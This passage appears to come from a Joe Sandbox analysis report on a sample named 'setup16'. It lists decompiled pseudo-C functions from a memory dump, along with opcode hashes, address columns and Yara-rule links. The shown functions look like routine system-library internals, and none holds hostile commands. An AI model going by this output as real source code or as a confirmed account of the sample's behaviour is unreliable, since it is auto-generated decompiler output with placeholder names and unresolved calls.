                                                                                                                                                                                                        0x04a8156a
                                                                                                                                                                                                        0x04a8157f

                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000006.00000002.370501493.00000000049A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049A0000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_49a0000_setup16.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                        • Opcode ID: c98c7185eb3b9bd0e15fd8a651e893634012f38f45e53a9614692b2e02758eee
                                                                                                                                                                                                        • Instruction ID: 0a39428aa9fde36089cd9145bf415cafd7ee261d9da9bce80ab96624f78bbb5a
                                                                                                                                                                                                        • Opcode Fuzzy Hash: c98c7185eb3b9bd0e15fd8a651e893634012f38f45e53a9614692b2e02758eee
                                                                                                                                                                                                        • Instruction Fuzzy Hash: DE019271A00248AFDB14EFA9D941EEEB7B8EF44704F40406AF904EB281D674EA01CB94
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 04A8138A Relevance: .0, Instructions: 48COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        C-Code - Quality: 61%
                                                                                                                                                                                                        			E04A8138A(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				short _v54;
				char _v60;
				void* __edi;
				void* __esi;
				signed char* _t21;
				intOrPtr _t27;
				intOrPtr _t33;
				intOrPtr _t34;
				signed int _t35;

				_t32 = __edx;
				_t27 = __ebx;
				_v8 =  *0x4abd360 ^ _t35;
				_t33 = __edx;
				_t34 = __ecx;
				E04A0FA60( &_v60, 0, 0x30);
				_v20 = _a4;
				_v16 = _a8;
				_v28 = _t34;
				_v24 = _t33;
				_v54 = 0x1033;
				if(E049E7D50() == 0) {
					_t21 = 0x7ffe0388;
				} else {
					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v60);
				_push(0x10);
				_push(0x20402);
				_push( *_t21 & 0x000000ff);
				return E04A0B640(E04A09AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
			}

















                                                                                                                                                                                                        0x04a8138a
                                                                                                                                                                                                        0x04a8138a
                                                                                                                                                                                                        0x04a81399
                                                                                                                                                                                                        0x04a813a3
                                                                                                                                                                                                        0x04a813a8
                                                                                                                                                                                                        0x04a813aa
                                                                                                                                                                                                        0x04a813b5
                                                                                                                                                                                                        0x04a813bb
                                                                                                                                                                                                        0x04a813c3
                                                                                                                                                                                                        0x04a813c6
                                                                                                                                                                                                        0x04a813c9
                                                                                                                                                                                                        0x04a813d4
                                                                                                                                                                                                        0x04a813e6
                                                                                                                                                                                                        0x04a813d6
                                                                                                                                                                                                        0x04a813df
                                                                                                                                                                                                        0x04a813df
                                                                                                                                                                                                        0x04a813f1
                                                                                                                                                                                                        0x04a813f2
                                                                                                                                                                                                        0x04a813f4
                                                                                                                                                                                                        0x04a813f9
                                                                                                                                                                                                        0x04a8140e

                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000006.00000002.370501493.00000000049A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049A0000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_49a0000_setup16.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                        • Opcode ID: 8d51a6f654222cc4e72d08c887505fd12f6b9eace016c20d16a2a33421b4d086
                                                                                                                                                                                                        • Instruction ID: fb21f77068730c83d658f0388bbf3240e286f2a7f90cbff6f37dcb81a0172be3
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8d51a6f654222cc4e72d08c887505fd12f6b9eace016c20d16a2a33421b4d086
                                                                                                                                                                                                        • Instruction Fuzzy Hash: BB015271A00218AFDB14EFA9D941EAEB7B8EF44710F40406AB904EB281E674EA41C795
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 049C58EC Relevance: .0, Instructions: 47COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        C-Code - Quality: 91%
                                                                                                                                                                                                        			E049C58EC(intOrPtr __ecx) {
				signed int _v8;
				char _v28;
				char _v44;
				char _v76;
				void* __edi;
				void* __esi;
				intOrPtr _t10;
				intOrPtr _t16;
				intOrPtr _t17;
				intOrPtr _t27;
				intOrPtr _t28;
				signed int _t29;

				_v8 =  *0x4abd360 ^ _t29;
				_t10 =  *[fs:0x30];
				_t27 = __ecx;
				if(_t10 == 0) {
					L6:
					_t28 = 0x49a5c80;
				} else {
					_t16 =  *((intOrPtr*)(_t10 + 0x10));
					if(_t16 == 0) {
						goto L6;
					} else {
						_t28 =  *((intOrPtr*)(_t16 + 0x3c));
					}
				}
				if(E049C5943() != 0 &&  *0x4ab5320 > 5) {
					E04A47B5E( &_v44, _t27);
					_t22 =  &_v28;
					E04A47B5E( &_v28, _t28);
					_t11 = E04A47B9C(0x4ab5320, 0x49abf15,  &_v28, _t22, 4,  &_v76);
				}
				return E04A0B640(_t11, _t17, _v8 ^ _t29, 0x49abf15, _t27, _t28);
			}















                                                                                                                                                                                                        0x049c58fb
                                                                                                                                                                                                        0x049c58fe
                                                                                                                                                                                                        0x049c5906
                                                                                                                                                                                                        0x049c590a
                                                                                                                                                                                                        0x049c593c
                                                                                                                                                                                                        0x049c593c
                                                                                                                                                                                                        0x049c590c
                                                                                                                                                                                                        0x049c590c
                                                                                                                                                                                                        0x049c5911
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x049c5913
                                                                                                                                                                                                        0x049c5913
                                                                                                                                                                                                        0x049c5913
                                                                                                                                                                                                        0x049c5911
                                                                                                                                                                                                        0x049c591d
                                                                                                                                                                                                        0x04a21035
                                                                                                                                                                                                        0x04a2103c
                                                                                                                                                                                                        0x04a2103f
                                                                                                                                                                                                        0x04a21056
                                                                                                                                                                                                        0x04a21056
                                                                                                                                                                                                        0x049c593b

                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000006.00000002.370501493.00000000049A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049A0000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_49a0000_setup16.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                        • Opcode ID: bd5b4b52cbe726a6a886e104d337b88ad5d6bf13550ac0c5727b37e91226737c
                                                                                                                                                                                                        • Instruction ID: 8611704672c38cf191a0caae7b17afbe09737dea92f605638326959b18beafa1
                                                                                                                                                                                                        • Opcode Fuzzy Hash: bd5b4b52cbe726a6a886e104d337b88ad5d6bf13550ac0c5727b37e91226737c
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 89018F71B00224BBE714EE69DD109AE77ADEB94238F9600B99906A7245EF30FD06C691
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 049DB02A Relevance: .0, Instructions: 46COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                        			E049DB02A(intOrPtr __ecx, signed short* __edx, short _a4) {
				signed char _t11;
				signed char* _t12;
				intOrPtr _t24;
				signed short* _t25;

				_t25 = __edx;
				_t24 = __ecx;
				_t11 = ( *[fs:0x30])[0x50];
				if(_t11 != 0) {
					if( *_t11 == 0) {
						goto L1;
					}
					_t12 = ( *[fs:0x30])[0x50] + 0x22a;
					L2:
					if( *_t12 != 0) {
						_t12 =  *[fs:0x30];
						if((_t12[0x240] & 0x00000004) == 0) {
							goto L3;
						}
						if(E049E7D50() == 0) {
							_t12 = 0x7ffe0385;
						} else {
							_t12 = ( *[fs:0x30])[0x50] + 0x22b;
						}
						if(( *_t12 & 0x00000020) == 0) {
							goto L3;
						}
						return E04A47016(_a4, _t24, 0, 0, _t25, 0);
					}
					L3:
					return _t12;
				}
				L1:
				_t12 = 0x7ffe0384;
				goto L2;
			}







                                                                                                                                                                                                        0x049db037
                                                                                                                                                                                                        0x049db039
                                                                                                                                                                                                        0x049db03b
                                                                                                                                                                                                        0x049db040
                                                                                                                                                                                                        0x04a2a60e
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a2a61d
                                                                                                                                                                                                        0x049db04b
                                                                                                                                                                                                        0x049db04e
                                                                                                                                                                                                        0x04a2a627
                                                                                                                                                                                                        0x04a2a634
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a2a641
                                                                                                                                                                                                        0x04a2a653
                                                                                                                                                                                                        0x04a2a643
                                                                                                                                                                                                        0x04a2a64c
                                                                                                                                                                                                        0x04a2a64c
                                                                                                                                                                                                        0x04a2a65b
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a2a66c
                                                                                                                                                                                                        0x049db057
                                                                                                                                                                                                        0x049db057
                                                                                                                                                                                                        0x049db057
                                                                                                                                                                                                        0x049db046
                                                                                                                                                                                                        0x049db046
                                                                                                                                                                                                        0x00000000

                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000006.00000002.370501493.00000000049A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049A0000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_49a0000_setup16.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                        • Opcode ID: 2e61b3b4b4670f516fc01dc09380e60ecf2e8637ce05565c6f774399af743f4d
                                                                                                                                                                                                        • Instruction ID: 9574ca27a9891d8e51b4044b9f1a1c213f1ca0f1fb96a22bffde3cbe28c8f2c7
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2e61b3b4b4670f516fc01dc09380e60ecf2e8637ce05565c6f774399af743f4d
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1F015A322019849FE322CB5DCA88F7677ECEB85B54F0A40B1A919CBA55E728FD40D621
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 04A91074 Relevance: .0, Instructions: 46COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                        			E04A91074(void* __ebx, signed int* __ecx, char __edx, void* __edi, intOrPtr _a4) {
				char _v8;
				void* _v11;
				unsigned int _v12;
				void* _v15;
				void* __esi;
				void* __ebp;
				char* _t16;
				signed int* _t35;

				_t22 = __ebx;
				_t35 = __ecx;
				_v8 = __edx;
				_t13 =  !( *__ecx) + 1;
				_v12 =  !( *__ecx) + 1;
				if(_a4 != 0) {
					E04A9165E(__ebx, 0x4ab8ae4, (__edx -  *0x4ab8b04 >> 0x14) + (__edx -  *0x4ab8b04 >> 0x14), __edi, __ecx, (__edx -  *0x4ab8b04 >> 0x14) + (__edx -  *0x4ab8b04 >> 0x14), (_t13 >> 0x14) + (_t13 >> 0x14));
				}
				E04A8AFDE( &_v8,  &_v12, 0x8000,  *((intOrPtr*)(_t35 + 0x34)),  *((intOrPtr*)(_t35 + 0x38)));
				if(E049E7D50() == 0) {
					_t16 = 0x7ffe0388;
				} else {
					_t16 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				if( *_t16 != 0) {
					_t16 = E04A7FE3F(_t22, _t35, _v8, _v12);
				}
				return _t16;
			}











                                                                                                                                                                                                        0x04a91074
                                                                                                                                                                                                        0x04a91080
                                                                                                                                                                                                        0x04a91082
                                                                                                                                                                                                        0x04a9108a
                                                                                                                                                                                                        0x04a9108f
                                                                                                                                                                                                        0x04a91093
                                                                                                                                                                                                        0x04a910ab
                                                                                                                                                                                                        0x04a910ab
                                                                                                                                                                                                        0x04a910c3
                                                                                                                                                                                                        0x04a910cf
                                                                                                                                                                                                        0x04a910e1
                                                                                                                                                                                                        0x04a910d1
                                                                                                                                                                                                        0x04a910da
                                                                                                                                                                                                        0x04a910da
                                                                                                                                                                                                        0x04a910e9
                                                                                                                                                                                                        0x04a910f5
                                                                                                                                                                                                        0x04a910f5
                                                                                                                                                                                                        0x04a910fe

                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000006.00000002.370501493.00000000049A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049A0000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_49a0000_setup16.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                        • Opcode ID: 95589646946d8dcb2a487a0f469cc4ba896f6295c1d7c0ebb5725c60fe9fc852
                                                                                                                                                                                                        • Instruction ID: 13631fc8fc7fc44de4b3c8ae086fe7d19877bf39644a6482d5950c9f498ff943
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 95589646946d8dcb2a487a0f469cc4ba896f6295c1d7c0ebb5725c60fe9fc852
                                                                                                                                                                                                        • Instruction Fuzzy Hash: BF012872504742AFEB11EB69D940B1A77E9AB84314F048529F88583291EE35FD40CB92
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 04A7FEC0 Relevance: .0, Instructions: 46COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        C-Code - Quality: 59%
                                                                                                                                                                                                        			E04A7FEC0(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v12;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				short _v58;
				char _v64;
				void* __edi;
				void* __esi;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_t24 = __ebx;
				_v12 =  *0x4abd360 ^ _t32;
				_t30 = __edx;
				_t31 = __ecx;
				E04A0FA60( &_v64, 0, 0x30);
				_v24 = _a4;
				_v32 = _t31;
				_v28 = _t30;
				_v58 = 0x266;
				if(E049E7D50() == 0) {
					_t18 = 0x7ffe0388;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v64);
				_push(0x10);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E04A0B640(E04A09AE0(), _t24, _v12 ^ _t32, _t29, _t30, _t31);
			}
















                                                                                                                                                                                                        0x04a7fec0
                                                                                                                                                                                                        0x04a7fec0
                                                                                                                                                                                                        0x04a7fecf
                                                                                                                                                                                                        0x04a7fed9
                                                                                                                                                                                                        0x04a7fede
                                                                                                                                                                                                        0x04a7fee0
                                                                                                                                                                                                        0x04a7feeb
                                                                                                                                                                                                        0x04a7fef3
                                                                                                                                                                                                        0x04a7fef6
                                                                                                                                                                                                        0x04a7fef9
                                                                                                                                                                                                        0x04a7ff04
                                                                                                                                                                                                        0x04a7ff16
                                                                                                                                                                                                        0x04a7ff06
                                                                                                                                                                                                        0x04a7ff0f
                                                                                                                                                                                                        0x04a7ff0f
                                                                                                                                                                                                        0x04a7ff21
                                                                                                                                                                                                        0x04a7ff22
                                                                                                                                                                                                        0x04a7ff24
                                                                                                                                                                                                        0x04a7ff29
                                                                                                                                                                                                        0x04a7ff3e

                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000006.00000002.370501493.00000000049A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049A0000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_49a0000_setup16.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                        • Opcode ID: 47108b36152892f7bc0e9eac71232931506a17cd837d5b33dee61038bd65ff81
                                                                                                                                                                                                        • Instruction ID: 32f3b6a21b499d2b68a36ba2cb8246620fe4d112b54ca5e889e2b94a01f18021
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 47108b36152892f7bc0e9eac71232931506a17cd837d5b33dee61038bd65ff81
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3A018F71E00208AFDB14DBA9E945FAFBBB8EF44704F404066F900AB291EA74EA01C795
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 04A7FE3F Relevance: .0, Instructions: 46COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        C-Code - Quality: 59%
                                                                                                                                                                                                        			E04A7FE3F(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v12;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				short _v58;
				char _v64;
				void* __edi;
				void* __esi;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_t24 = __ebx;
				_v12 =  *0x4abd360 ^ _t32;
				_t30 = __edx;
				_t31 = __ecx;
				E04A0FA60( &_v64, 0, 0x30);
				_v24 = _a4;
				_v32 = _t31;
				_v28 = _t30;
				_v58 = 0x267;
				if(E049E7D50() == 0) {
					_t18 = 0x7ffe0388;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v64);
				_push(0x10);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E04A0B640(E04A09AE0(), _t24, _v12 ^ _t32, _t29, _t30, _t31);
			}
















                                                                                                                                                                                                        0x04a7fe3f
                                                                                                                                                                                                        0x04a7fe3f
                                                                                                                                                                                                        0x04a7fe4e
                                                                                                                                                                                                        0x04a7fe58
                                                                                                                                                                                                        0x04a7fe5d
                                                                                                                                                                                                        0x04a7fe5f
                                                                                                                                                                                                        0x04a7fe6a
                                                                                                                                                                                                        0x04a7fe72
                                                                                                                                                                                                        0x04a7fe75
                                                                                                                                                                                                        0x04a7fe78
                                                                                                                                                                                                        0x04a7fe83
                                                                                                                                                                                                        0x04a7fe95
                                                                                                                                                                                                        0x04a7fe85
                                                                                                                                                                                                        0x04a7fe8e
                                                                                                                                                                                                        0x04a7fe8e
                                                                                                                                                                                                        0x04a7fea0
                                                                                                                                                                                                        0x04a7fea1
                                                                                                                                                                                                        0x04a7fea3
                                                                                                                                                                                                        0x04a7fea8
                                                                                                                                                                                                        0x04a7febd

                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000006.00000002.370501493.00000000049A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049A0000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_49a0000_setup16.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                        • Opcode ID: 2e3f6b085b11477801bc4c62b441b49c2fbd6d0c5fbe6130d86fa9baea6ee336
                                                                                                                                                                                                        • Instruction ID: 95308bec8b730d217e581db1c3c9405ae51afc9406b4e153231bf557d2f828aa
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2e3f6b085b11477801bc4c62b441b49c2fbd6d0c5fbe6130d86fa9baea6ee336
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 30018471E00208AFDB14DFA9E845FAEB7B8EF44704F004066F900AB291DA74EA01C7A5
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 04A98ED6 Relevance: .0, Instructions: 44COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        C-Code - Quality: 54%
                                                                                                                                                                                                        			E04A98ED6(intOrPtr __ecx, intOrPtr __edx) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				short _v62;
				char _v68;
				signed char* _t29;
				intOrPtr _t35;
				intOrPtr _t41;
				intOrPtr _t42;
				signed int _t43;

				_t40 = __edx;
				_v8 =  *0x4abd360 ^ _t43;
				_v28 = __ecx;
				_v62 = 0x1c2a;
				_v36 =  *((intOrPtr*)(__edx + 0xc8));
				_v32 =  *((intOrPtr*)(__edx + 0xcc));
				_v20 =  *((intOrPtr*)(__edx + 0xd8));
				_v16 =  *((intOrPtr*)(__edx + 0xd4));
				_v24 = __edx;
				_v12 = ( *(__edx + 0xde) & 0x000000ff) >> 0x00000001 & 0x00000001;
				if(E049E7D50() == 0) {
					_t29 = 0x7ffe0386;
				} else {
					_t29 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v68);
				_push(0x1c);
				_push(0x20402);
				_push( *_t29 & 0x000000ff);
				return E04A0B640(E04A09AE0(), _t35, _v8 ^ _t43, _t40, _t41, _t42);
			}


















                                                                                                                                                                                                        0x04a98ed6
                                                                                                                                                                                                        0x04a98ee5
                                                                                                                                                                                                        0x04a98eed
                                                                                                                                                                                                        0x04a98ef0
                                                                                                                                                                                                        0x04a98efa
                                                                                                                                                                                                        0x04a98f03
                                                                                                                                                                                                        0x04a98f0c
                                                                                                                                                                                                        0x04a98f15
                                                                                                                                                                                                        0x04a98f24
                                                                                                                                                                                                        0x04a98f27
                                                                                                                                                                                                        0x04a98f31
                                                                                                                                                                                                        0x04a98f43
                                                                                                                                                                                                        0x04a98f33
                                                                                                                                                                                                        0x04a98f3c
                                                                                                                                                                                                        0x04a98f3c
                                                                                                                                                                                                        0x04a98f4e
                                                                                                                                                                                                        0x04a98f4f
                                                                                                                                                                                                        0x04a98f51
                                                                                                                                                                                                        0x04a98f56
                                                                                                                                                                                                        0x04a98f69

                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000006.00000002.370501493.00000000049A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049A0000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_49a0000_setup16.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                        • Opcode ID: 432260ca1355953cf7afe05d120f271efd1faebff801a145f55e46cab86e719c
                                                                                                                                                                                                        • Instruction ID: edda21bb2d91eb94cabc3bb3c83434b5b0f609556eedc24b9ea80f1049168598
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 432260ca1355953cf7afe05d120f271efd1faebff801a145f55e46cab86e719c
                                                                                                                                                                                                        • Instruction Fuzzy Hash: BF110070A002099FDB04DFA9D545AAEB7F4FB08700F0482AAE518EB382E634A941CB90
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 04A98A62 Relevance: .0, Instructions: 44COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        C-Code - Quality: 54%
                                                                                                                                                                                                        			E04A98A62(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v12;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				short _v66;
				char _v72;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed char* _t18;
				signed int _t32;

				_t29 = __edx;
				_v12 =  *0x4abd360 ^ _t32;
				_t31 = _a8;
				_t30 = _a12;
				_v66 = 0x1c20;
				_v40 = __ecx;
				_v36 = __edx;
				_v32 = _a4;
				_v28 = _a8;
				_v24 = _a12;
				if(E049E7D50() == 0) {
					_t18 = 0x7ffe0386;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v72);
				_push(0x14);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E04A0B640(E04A09AE0(), 0x1c20, _v12 ^ _t32, _t29, _t30, _t31);
			}
















                                                                                                                                                                                                        0x04a98a62
                                                                                                                                                                                                        0x04a98a71
                                                                                                                                                                                                        0x04a98a79
                                                                                                                                                                                                        0x04a98a82
                                                                                                                                                                                                        0x04a98a85
                                                                                                                                                                                                        0x04a98a89
                                                                                                                                                                                                        0x04a98a8c
                                                                                                                                                                                                        0x04a98a8f
                                                                                                                                                                                                        0x04a98a92
                                                                                                                                                                                                        0x04a98a95
                                                                                                                                                                                                        0x04a98a9f
                                                                                                                                                                                                        0x04a98ab1
                                                                                                                                                                                                        0x04a98aa1
                                                                                                                                                                                                        0x04a98aaa
                                                                                                                                                                                                        0x04a98aaa
                                                                                                                                                                                                        0x04a98abc
                                                                                                                                                                                                        0x04a98abd
                                                                                                                                                                                                        0x04a98abf
                                                                                                                                                                                                        0x04a98ac4
                                                                                                                                                                                                        0x04a98ada

                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000006.00000002.370501493.00000000049A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049A0000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_49a0000_setup16.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                        • Opcode ID: a7812bd0b9ce000caa06f6ef92531c3d8d81a543c33c55ecc52f31885df1cc08
                                                                                                                                                                                                        • Instruction ID: 8d0066d2f912c543feb115ce277014b2b1c0617ad43c8d74fd089be9b1e4bb5b
                                                                                                                                                                                                        • Opcode Fuzzy Hash: a7812bd0b9ce000caa06f6ef92531c3d8d81a543c33c55ecc52f31885df1cc08
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4D011AB1A0021CAFDB00DFA9E9419EEB7F8EF49310F50406AF904E7391E634AD018BA0
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 049CDB60 Relevance: .0, Instructions: 43COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                        			E049CDB60(signed int __ecx) {
				intOrPtr* _t9;
				void* _t12;
				void* _t13;
				intOrPtr _t14;

				_t9 = __ecx;
				_t14 = 0;
				if(__ecx == 0 ||  *((intOrPtr*)(__ecx)) != 0) {
					_t13 = 0xc000000d;
				} else {
					_t14 = E049CDB40();
					if(_t14 == 0) {
						_t13 = 0xc0000017;
					} else {
						_t13 = E049CE7B0(__ecx, _t12, _t14, 0xfff);
						if(_t13 < 0) {
							L049CE8B0(__ecx, _t14, 0xfff);
							L049E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t14);
							_t14 = 0;
						} else {
							_t13 = 0;
							 *((intOrPtr*)(_t14 + 0xc)) =  *0x7ffe03a4;
						}
					}
				}
				 *_t9 = _t14;
				return _t13;
			}







                                                                                                                                                                                                        0x049cdb64
                                                                                                                                                                                                        0x049cdb66
                                                                                                                                                                                                        0x049cdb6b
                                                                                                                                                                                                        0x049cdbaa
                                                                                                                                                                                                        0x049cdb71
                                                                                                                                                                                                        0x049cdb76
                                                                                                                                                                                                        0x049cdb7a
                                                                                                                                                                                                        0x049cdba3
                                                                                                                                                                                                        0x049cdb7c
                                                                                                                                                                                                        0x049cdb87
                                                                                                                                                                                                        0x049cdb8b
                                                                                                                                                                                                        0x04a24fa1
                                                                                                                                                                                                        0x04a24fb3
                                                                                                                                                                                                        0x04a24fb8
                                                                                                                                                                                                        0x049cdb91
                                                                                                                                                                                                        0x049cdb96
                                                                                                                                                                                                        0x049cdb98
                                                                                                                                                                                                        0x049cdb98
                                                                                                                                                                                                        0x049cdb8b
                                                                                                                                                                                                        0x049cdb7a
                                                                                                                                                                                                        0x049cdb9d
                                                                                                                                                                                                        0x049cdba2

                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000006.00000002.370501493.00000000049A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049A0000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_49a0000_setup16.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID:
